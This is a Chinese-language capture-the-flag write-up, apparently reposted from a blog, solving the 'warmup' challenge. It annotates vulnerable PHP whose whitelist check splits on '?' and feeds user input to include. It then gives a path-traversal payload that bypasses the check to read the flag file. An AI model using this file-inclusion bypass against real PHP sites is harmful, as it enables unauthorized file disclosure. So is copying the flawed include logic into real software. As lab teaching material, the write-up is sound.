文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

攻防世界-warmup详解

2023-08-31 06:44

关注

只有一个表情,没有其他的信息,因此我们进行查看源码,发现source.php

 2、访问source.php可以看的出来是代码审计

因此我们需要对其代码进行了解

"source.php","hint"=>"hint.php"]; #白名单            if (! isset($page) || !is_string($page)) { #isset()判断是否为空为空-true不为空-false is_string 判断是否是字符串 是则为true,否则为false                echo "you can't see it";                return false;            }            if (in_array($page, $whitelist)) { #inarray()检测$page在不在$whitelist中,在为true,否则为false                return true;            }            $_page = mb_substr( #mb_stustr截取字符串  mb_strpos查找字符串                $page,                 0,                mb_strpos($page . '?', '?')            );            if (in_array($_page, $whitelist)) {                return true;            }            $_page = urldecode($page); #进行一次url解码            $_page = mb_substr(                $_page,                0,                mb_strpos($_page . '?', '?')            );            if (in_array($_page, $whitelist)) {                return true;            }            echo "you can't see it";            return false;        }    }    if (! empty($_REQUEST['file'])        && is_string($_REQUEST['file'])        && emmm::checkFile($_REQUEST['file'])    ) {        include $_REQUEST['file']; #动态包含 include语句包含并运行指定文件        #如果定义了路径一-- 不管是绝对路径(在Windows下以盘符或者| 开头,在Unix/Linux下以/开头)还是当前目录的相对路径(以. 或者…开头)         #--include_ path 都会被完全忽略。例如一个文件以.开头,则解析器会在当前目录的父目录下寻找该文件。        exit;    } else {        echo "
"; }

了解了源代码后,我们就可以构建flag

在代码审计的时候我们需要看清楚$page和$_page不要看混了

3、构建payload,得到flag

?file=hint.php?../../../../../ffffllllaaaagggg

 

来源地址:https://blog.csdn.net/qq_62794597/article/details/127795151

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯